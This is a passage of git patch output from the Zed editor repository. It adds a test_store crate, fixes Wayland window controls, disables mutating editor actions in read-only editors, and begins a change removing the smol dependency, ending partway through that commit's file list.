From 06d74b2eb474d437449d73c81624bf7ccaf6e81f Mon Sep 17 00:00:00 2001 From: BEKs Date: Fri, 24 Apr 2026 16:38:17 +0300 Subject: [PATCH 001/231] initial design for test_store feature --- Cargo.lock | 4 ++++ Cargo.toml | 1 + crates/test_store/Cargo.toml | 15 +++++++++++++++ crates/test_store/src/test_case.rs | 18 ++++++++++++++++++ crates/test_store/src/test_discovery.rs | 0 crates/test_store/src/test_store.rs | 21 +++++++++++++++++++++ crates/test_store/src/test_suite.rs | 16 ++++++++++++++++ 7 files changed, 75 insertions(+) create mode 100644 crates/test_store/Cargo.toml create mode 100644 crates/test_store/src/test_case.rs create mode 100644 crates/test_store/src/test_discovery.rs create mode 100644 crates/test_store/src/test_store.rs create mode 100644 crates/test_store/src/test_suite.rs diff --git a/Cargo.lock b/Cargo.lock index 05a2536b4ef455..29bd35ca97de9b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -17849,6 +17849,10 @@ dependencies = [ "zed_actions", ] +[[package]] +name = "test_store" +version = "0.1.0" + [[package]] name = "text" version = "0.1.0" diff --git a/Cargo.toml b/Cargo.toml index 5d403c48c6fc97..b8462617ab367b 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -250,6 +250,7 @@ members = [ "tooling/compliance", "tooling/perf", "tooling/xtask", + "crates/test_store", ] default-members = ["crates/zed"] diff --git a/crates/test_store/Cargo.toml b/crates/test_store/Cargo.toml new file mode 100644 index 00000000000000..034213b9ba597b --- /dev/null +++ b/crates/test_store/Cargo.toml @@ -0,0 +1,15 @@ +[package] +name = "test_store" +version = "0.1.0" +publish.workspace = true +edition.workspace = true +license = "GPL-3.0-or-later" + +[lib] +path = "src/test_store.rs" +doctest = false + +[dependencies] + +[lints] +workspace = true diff --git a/crates/test_store/src/test_case.rs b/crates/test_store/src/test_case.rs new file mode 100644 index 00000000000000..72959ddef491d3 --- /dev/null +++ b/crates/test_store/src/test_case.rs @@ -0,0 +1,18 @@ +use crate::{State, Status}; + +#[derive(Debug, Clone)] +pub struct ErrorInfo {} + +#[derive(Debug, Clone, Default)] +pub struct TestCase { + // Tells the state that the test case is in + pub state: State, + // Tells the status of the test case after an execution round + pub status: Status, + // Tells the number of times the test case has been executed in this session + pub runs: u16, + // Tells the error information provided after the execution of the test case + pub error_info: Option, +} + +impl TestCase {} diff --git a/crates/test_store/src/test_discovery.rs b/crates/test_store/src/test_discovery.rs new file mode 100644 index 00000000000000..e69de29bb2d1d6 diff --git a/crates/test_store/src/test_store.rs b/crates/test_store/src/test_store.rs new file mode 100644 index 00000000000000..3a89460a82af86 --- /dev/null +++ b/crates/test_store/src/test_store.rs @@ -0,0 +1,21 @@ +pub mod test_case; +pub mod test_discovery; +pub mod test_suite; + +#[derive(Debug, Clone, Default)] +pub enum State { + Executed, + #[default] + NotExecuted, + Disabled, +} + +#[derive(Debug, Clone, Default)] +pub enum Status { + Pass, + Failed, + Skipped, + Crashed, + #[default] + Initialized, +} diff --git a/crates/test_store/src/test_suite.rs b/crates/test_store/src/test_suite.rs new file mode 100644 index 00000000000000..eb7e8990ff5a38 --- /dev/null +++ b/crates/test_store/src/test_suite.rs @@ -0,0 +1,16 @@ +use crate::{State, Status, test_case::TestCase}; + +#[derive(Debug, Clone, Default)] +pub struct TestSuite { + // Tells the state that the test case is in + pub state: State, + // Tells the status of the test case after an execution round + pub status: Status, + // Tells the number of times the test case has been executed in this session + pub runs: u16, + // Tells the number of test cases in the suite + pub count: u32, + // The test cases in the test suite + pub cases: Vec, +} +impl TestSuite {} From d6a7ad20324b8e26ac36c67b81f05f4adfbc527f Mon Sep 17 00:00:00 2001 From: Moulberry Date: Fri, 24 Apr 2026 18:10:12 +0800 Subject: [PATCH 002/231] Fix showing unsupported window controls on Linux Wayland (#50609) Release Notes: - Fixed showing unsupported window controls on Linux Wayland Before: image After: image Co-authored-by: Ben Kunkle --- crates/gpui_linux/src/linux/wayland/window.rs | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 9f2556fc2aea66..9862d307ef0f92 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -774,7 +774,12 @@ impl WaylandWindowStatePtr { } } xdg_toplevel::Event::WmCapabilities { capabilities } => { - let mut window_controls = WindowControls::default(); + let mut window_controls = WindowControls { + maximize: false, + minimize: false, + fullscreen: false, + window_menu: false, + }; let states = extract_states::(&capabilities); From 9140a99820029fcb70eab92f21beef85100c7c09 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Fri, 24 Apr 2026 13:17:53 +0300 Subject: [PATCH 003/231] Exit early on mutating actions in readonly editor (#54758) Hides and disables all mutating editor actions for readonly editors. Certain actions (as cmd-backspace mentioned in the issue) could be somewhat beneficial to have for navigation purposes, but we'd better shape that story properly, let's build a "harness" and disable the mutating ones first. Closes https://github.com/zed-industries/zed/issues/47333 Release Notes: - Fixed readonly editor having certain mutation actions enabled --- crates/editor/src/editor.rs | 118 ++++++++++++++ crates/editor/src/element.rs | 298 ++++++++++++++++++----------------- 2 files changed, 268 insertions(+), 148 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index d87729db8684b8..7d425fa98f4f03 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -6682,6 +6682,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) } @@ -6692,6 +6695,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) } @@ -6702,6 +6708,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) } @@ -7196,6 +7205,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let actions_menu = @@ -8375,6 +8387,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } if self.show_edit_predictions_in_menu() { self.hide_context_menu(window, cx); } @@ -11725,6 +11740,9 @@ impl Editor { } pub fn delete_line(&mut self, _: &DeleteLine, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let selections = self.selections.all::(&display_map); @@ -12018,6 +12036,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.buffer.read(cx).snapshot(cx); @@ -12118,6 +12139,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut buffer_ids = HashSet::default(); let snapshot = self.buffer().read(cx).snapshot(cx); @@ -12137,6 +12161,9 @@ impl Editor { } pub fn git_restore(&mut self, _: &Restore, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let selections = self .selections @@ -12156,6 +12183,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } let selections = self .selections .all(&self.display_snapshot(cx)) @@ -12563,6 +12593,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); @@ -12801,6 +12834,9 @@ impl Editor { } fn rotate_selections(&mut self, window: &mut Window, cx: &mut Context, reverse: bool) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); let selections = self.selections.all::(&display_snapshot); @@ -12952,6 +12988,9 @@ impl Editor { ) where M: FnMut(&str) -> LineManipulationResult, { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); @@ -13371,6 +13410,10 @@ impl Editor { where Fn: FnMut(&str) -> String, { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let mut new_selections = Vec::new(); @@ -13467,6 +13510,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); @@ -13612,6 +13658,9 @@ impl Editor { } pub fn move_line_up(&mut self, _: &MoveLineUp, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); @@ -13723,6 +13772,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); @@ -13817,6 +13869,9 @@ impl Editor { } pub fn transpose(&mut self, _: &Transpose, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.transact(window, cx, |this, window, cx| { @@ -13879,6 +13934,9 @@ impl Editor { } pub fn rewrap(&mut self, _: &Rewrap, _: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); @@ -13889,6 +13947,9 @@ impl Editor { } pub fn rewrap_impl(&mut self, options: RewrapOptions, cx: &mut Context) { + if self.read_only(cx) { + return; + } let buffer = self.buffer.read(cx).snapshot(cx); let selections = self.selections.all::(&self.display_snapshot(cx)); @@ -14335,12 +14396,18 @@ impl Editor { } pub fn cut(&mut self, _: &Cut, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let item = self.cut_common(true, window, cx); cx.write_to_clipboard(item); } pub fn kill_ring_cut(&mut self, _: &KillRingCut, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { s.move_with(&mut |snapshot, sel| { @@ -14707,6 +14774,9 @@ impl Editor { } pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if let Some(item) = cx.read_from_clipboard() { let clipboard_string = item.entries().iter().find_map(|entry| match entry { @@ -15342,6 +15412,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); @@ -15373,6 +15446,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); @@ -15460,6 +15536,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { @@ -15490,6 +15569,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { @@ -15566,6 +15648,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { @@ -15626,6 +15711,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( @@ -15645,6 +15733,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( @@ -17614,6 +17705,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); @@ -19726,6 +19820,9 @@ impl Editor { ) -> Option>> { use language::ToOffset as _; + if self.read_only(cx) { + return None; + } let provider = self.semantics_provider.clone()?; let selection = self.selections.newest_anchor().clone(); let (cursor_buffer, cursor_buffer_position) = self @@ -19914,6 +20011,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } let rename = self.take_rename(false, window, cx)?; let workspace = self.workspace()?.downgrade(); let (buffer, start) = self @@ -20034,6 +20134,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { @@ -20056,6 +20159,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { @@ -20175,6 +20281,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), @@ -21756,6 +21865,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffers = self.buffer.read(cx).all_buffers(); @@ -21786,6 +21898,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.snapshot(window, cx); let hunks = snapshot.hunks_for_ranges( @@ -24123,6 +24238,9 @@ impl Editor { } fn insert_uuid(&mut self, version: UuidVersion, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { let edits = this diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index dd10b734d9fe3b..c52a0d76bdbc47 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -249,65 +249,12 @@ impl EditorElement { register_action(editor, window, Editor::select_page_down); register_action(editor, window, Editor::select_page_up); register_action(editor, window, Editor::cancel); - register_action(editor, window, Editor::newline); - register_action(editor, window, Editor::newline_above); - register_action(editor, window, Editor::newline_below); - register_action(editor, window, Editor::backspace); register_action(editor, window, Editor::blame_hover); - register_action(editor, window, Editor::delete); - register_action(editor, window, Editor::tab); register_action(editor, window, Editor::next_snippet_tabstop); register_action(editor, window, Editor::previous_snippet_tabstop); - register_action(editor, window, Editor::backtab); - register_action(editor, window, Editor::indent); - register_action(editor, window, Editor::outdent); - register_action(editor, window, Editor::autoindent); - register_action(editor, window, Editor::delete_line); - register_action(editor, window, Editor::join_lines); - register_action(editor, window, Editor::sort_lines_by_length); - register_action(editor, window, Editor::sort_lines_case_sensitive); - register_action(editor, window, Editor::sort_lines_case_insensitive); - register_action(editor, window, Editor::reverse_lines); - register_action(editor, window, Editor::shuffle_lines); - register_action(editor, window, Editor::rotate_selections_forward); - register_action(editor, window, Editor::rotate_selections_backward); - register_action(editor, window, Editor::convert_indentation_to_spaces); - register_action(editor, window, Editor::convert_indentation_to_tabs); - register_action(editor, window, Editor::convert_to_upper_case); - register_action(editor, window, Editor::convert_to_lower_case); - register_action(editor, window, Editor::convert_to_title_case); - register_action(editor, window, Editor::convert_to_snake_case); - register_action(editor, window, Editor::convert_to_kebab_case); - register_action(editor, window, Editor::convert_to_upper_camel_case); - register_action(editor, window, Editor::convert_to_lower_camel_case); - register_action(editor, window, Editor::convert_to_opposite_case); - register_action(editor, window, Editor::convert_to_sentence_case); - register_action(editor, window, Editor::toggle_case); - register_action(editor, window, Editor::convert_to_rot13); - register_action(editor, window, Editor::convert_to_rot47); - register_action(editor, window, Editor::delete_to_previous_word_start); - register_action(editor, window, Editor::delete_to_previous_subword_start); - register_action(editor, window, Editor::delete_to_next_word_end); - register_action(editor, window, Editor::delete_to_next_subword_end); - register_action(editor, window, Editor::delete_to_beginning_of_line); - register_action(editor, window, Editor::delete_to_end_of_line); - register_action(editor, window, Editor::cut_to_end_of_line); - register_action(editor, window, Editor::duplicate_line_up); - register_action(editor, window, Editor::duplicate_line_down); - register_action(editor, window, Editor::duplicate_selection); - register_action(editor, window, Editor::move_line_up); - register_action(editor, window, Editor::move_line_down); - register_action(editor, window, Editor::transpose); - register_action(editor, window, Editor::rewrap); - register_action(editor, window, Editor::cut); - register_action(editor, window, Editor::kill_ring_cut); - register_action(editor, window, Editor::kill_ring_yank); register_action(editor, window, Editor::copy); register_action(editor, window, Editor::copy_and_trim); register_action(editor, window, Editor::diff_clipboard_with_selection); - register_action(editor, window, Editor::paste); - register_action(editor, window, Editor::undo); - register_action(editor, window, Editor::redo); register_action(editor, window, Editor::move_page_up); register_action(editor, window, Editor::move_page_down); register_action(editor, window, Editor::next_screen); @@ -324,16 +271,6 @@ impl EditorElement { register_action(editor, window, |editor, _: &HalfPageDown, window, cx| { editor.scroll_screen(&ScrollAmount::Page(0.5), window, cx) }); - register_action( - editor, - window, - |editor, HandleInput(text): &HandleInput, window, cx| { - if text.is_empty() { - return; - } - editor.handle_input(text, window, cx); - }, - ); register_action(editor, window, |editor, _: &HalfPageUp, window, cx| { editor.scroll_screen(&ScrollAmount::Page(-0.5), window, cx) }); @@ -396,8 +333,6 @@ impl EditorElement { register_action(editor, window, |editor, action, window, cx| { editor.find_previous_match(action, window, cx).log_err(); }); - register_action(editor, window, Editor::toggle_comments); - register_action(editor, window, Editor::toggle_block_comments); register_action(editor, window, Editor::select_larger_syntax_node); register_action(editor, window, Editor::select_smaller_syntax_node); register_action(editor, window, Editor::select_next_syntax_node); @@ -408,7 +343,6 @@ impl EditorElement { Editor::select_to_start_of_larger_syntax_node, ); register_action(editor, window, Editor::select_to_end_of_larger_syntax_node); - register_action(editor, window, Editor::unwrap_syntax_node); register_action(editor, window, Editor::move_to_start_of_larger_syntax_node); register_action(editor, window, Editor::move_to_end_of_larger_syntax_node); register_action(editor, window, Editor::select_enclosing_symbol); @@ -546,54 +480,9 @@ impl EditorElement { register_action(editor, window, Editor::go_to_next_reference); register_action(editor, window, Editor::go_to_previous_symbol); register_action(editor, window, Editor::go_to_next_symbol); - - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.format(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - if editor.read(cx).can_format_selections(cx) { - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.format_selections(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - } - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.organize_imports(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); register_action(editor, window, Editor::restart_language_server); register_action(editor, window, Editor::stop_language_server); register_action(editor, window, Editor::show_character_palette); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_completion(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_completion_replace(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_completion_insert(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); register_action(editor, window, |editor, action, window, cx| { if let Some(task) = editor.compose_completion(action, window, cx) { editor.detach_and_notify_err(task, window, cx); @@ -601,27 +490,6 @@ impl EditorElement { cx.propagate(); } }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_code_action(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.rename(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_rename(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); register_action(editor, window, |editor, action, window, cx| { if let Some(task) = editor.find_all_references(action, window, cx) { task.detach_and_log_err(cx); @@ -638,21 +506,8 @@ impl EditorElement { register_action(editor, window, Editor::context_menu_next); register_action(editor, window, Editor::context_menu_last); register_action(editor, window, Editor::display_cursor_names); - register_action(editor, window, Editor::unique_lines_case_insensitive); - register_action(editor, window, Editor::unique_lines_case_sensitive); - register_action(editor, window, Editor::accept_next_word_edit_prediction); - register_action(editor, window, Editor::accept_next_line_edit_prediction); - register_action(editor, window, Editor::accept_edit_prediction); - register_action(editor, window, Editor::restore_file); - register_action(editor, window, Editor::git_restore); - register_action(editor, window, Editor::restore_and_next); - register_action(editor, window, Editor::apply_all_diff_hunks); - register_action(editor, window, Editor::apply_selected_diff_hunks); register_action(editor, window, Editor::open_active_item_in_terminal); - register_action(editor, window, Editor::reload_file); register_action(editor, window, Editor::spawn_nearest_task); - register_action(editor, window, Editor::insert_uuid_v4); - register_action(editor, window, Editor::insert_uuid_v7); register_action(editor, window, Editor::open_selections_in_multibuffer); register_action(editor, window, Editor::toggle_bookmark); register_action(editor, window, Editor::go_to_next_bookmark); @@ -662,9 +517,156 @@ impl EditorElement { register_action(editor, window, Editor::enable_breakpoint); register_action(editor, window, Editor::disable_breakpoint); register_action(editor, window, Editor::toggle_read_only); - register_action(editor, window, Editor::align_selections); - if editor.read(cx).enable_wrap_selections_in_tag(cx) { - register_action(editor, window, Editor::wrap_selections_in_tag); + register_action(editor, window, Editor::reload_file); + + if !editor.read(cx).read_only(cx) { + register_action(editor, window, Editor::newline); + register_action(editor, window, Editor::newline_above); + register_action(editor, window, Editor::newline_below); + register_action(editor, window, Editor::backspace); + register_action(editor, window, Editor::delete); + register_action(editor, window, Editor::tab); + register_action(editor, window, Editor::backtab); + register_action(editor, window, Editor::indent); + register_action(editor, window, Editor::outdent); + register_action(editor, window, Editor::autoindent); + register_action(editor, window, Editor::delete_line); + register_action(editor, window, Editor::join_lines); + register_action(editor, window, Editor::sort_lines_by_length); + register_action(editor, window, Editor::sort_lines_case_sensitive); + register_action(editor, window, Editor::sort_lines_case_insensitive); + register_action(editor, window, Editor::unique_lines_case_insensitive); + register_action(editor, window, Editor::unique_lines_case_sensitive); + register_action(editor, window, Editor::reverse_lines); + register_action(editor, window, Editor::shuffle_lines); + register_action(editor, window, Editor::rotate_selections_forward); + register_action(editor, window, Editor::rotate_selections_backward); + register_action(editor, window, Editor::convert_indentation_to_spaces); + register_action(editor, window, Editor::convert_indentation_to_tabs); + register_action(editor, window, Editor::convert_to_upper_case); + register_action(editor, window, Editor::convert_to_lower_case); + register_action(editor, window, Editor::convert_to_title_case); + register_action(editor, window, Editor::convert_to_snake_case); + register_action(editor, window, Editor::convert_to_kebab_case); + register_action(editor, window, Editor::convert_to_upper_camel_case); + register_action(editor, window, Editor::convert_to_lower_camel_case); + register_action(editor, window, Editor::convert_to_opposite_case); + register_action(editor, window, Editor::convert_to_sentence_case); + register_action(editor, window, Editor::toggle_case); + register_action(editor, window, Editor::convert_to_rot13); + register_action(editor, window, Editor::convert_to_rot47); + register_action(editor, window, Editor::delete_to_previous_word_start); + register_action(editor, window, Editor::delete_to_previous_subword_start); + register_action(editor, window, Editor::delete_to_next_word_end); + register_action(editor, window, Editor::delete_to_next_subword_end); + register_action(editor, window, Editor::delete_to_beginning_of_line); + register_action(editor, window, Editor::delete_to_end_of_line); + register_action(editor, window, Editor::cut_to_end_of_line); + register_action(editor, window, Editor::duplicate_line_up); + register_action(editor, window, Editor::duplicate_line_down); + register_action(editor, window, Editor::duplicate_selection); + register_action(editor, window, Editor::move_line_up); + register_action(editor, window, Editor::move_line_down); + register_action(editor, window, Editor::transpose); + register_action(editor, window, Editor::rewrap); + register_action(editor, window, Editor::cut); + register_action(editor, window, Editor::kill_ring_cut); + register_action(editor, window, Editor::kill_ring_yank); + register_action(editor, window, Editor::paste); + register_action(editor, window, Editor::undo); + register_action(editor, window, Editor::redo); + register_action(editor, window, Editor::toggle_comments); + register_action(editor, window, Editor::toggle_block_comments); + register_action(editor, window, Editor::unwrap_syntax_node); + register_action(editor, window, Editor::accept_next_word_edit_prediction); + register_action(editor, window, Editor::accept_next_line_edit_prediction); + register_action(editor, window, Editor::accept_edit_prediction); + register_action(editor, window, Editor::restore_file); + register_action(editor, window, Editor::git_restore); + register_action(editor, window, Editor::restore_and_next); + register_action(editor, window, Editor::apply_all_diff_hunks); + register_action(editor, window, Editor::apply_selected_diff_hunks); + register_action(editor, window, Editor::insert_uuid_v4); + register_action(editor, window, Editor::insert_uuid_v7); + register_action(editor, window, Editor::align_selections); + if editor.read(cx).enable_wrap_selections_in_tag(cx) { + register_action(editor, window, Editor::wrap_selections_in_tag); + } + register_action( + editor, + window, + |editor, HandleInput(text): &HandleInput, window, cx| { + if text.is_empty() { + return; + } + editor.handle_input(text, window, cx); + }, + ); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.format(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + if editor.read(cx).can_format_selections(cx) { + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.format_selections(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + } + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.organize_imports(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_completion(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_completion_replace(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_completion_insert(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_code_action(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.rename(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_rename(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); } } From 2eb012fc9c91301a041595de88289975d21e0d9c Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Fri, 24 Apr 2026 12:29:51 +0200 Subject: [PATCH 004/231] Remove smol as a dependency from a bunch of crates (#53603) We aren't making use of it in these crates and it unblocks some web-related work Release Notes: - N/A or Added/Fixed/Improved ... --- Cargo.lock | 87 +++++++------- Cargo.toml | 4 +- crates/acp_thread/Cargo.toml | 2 +- crates/acp_thread/src/acp_thread.rs | 4 +- crates/acp_thread/src/connection.rs | 2 +- crates/agent/Cargo.toml | 3 +- crates/agent/src/agent.rs | 8 +- crates/agent/src/edit_agent/evals.rs | 2 +- .../src/tools/evals/streaming_edit_file.rs | 2 +- crates/agent_servers/Cargo.toml | 2 +- crates/agent_servers/src/acp.rs | 20 ++-- crates/agent_ui/Cargo.toml | 2 +- crates/agent_ui/src/buffer_codegen.rs | 2 +- crates/agent_ui/src/inline_assistant.rs | 2 +- crates/agent_ui/src/thread_metadata_store.rs | 14 +-- crates/agent_ui/src/threads_archive_view.rs | 4 +- crates/client/Cargo.toml | 1 + crates/client/src/client.rs | 10 +- crates/cloud_api_client/Cargo.toml | 2 +- crates/cloud_api_client/src/llm_token.rs | 2 +- crates/collab/Cargo.toml | 1 + .../collab/tests/integration/editor_tests.rs | 4 +- crates/context_server/Cargo.toml | 5 +- crates/context_server/src/client.rs | 10 +- 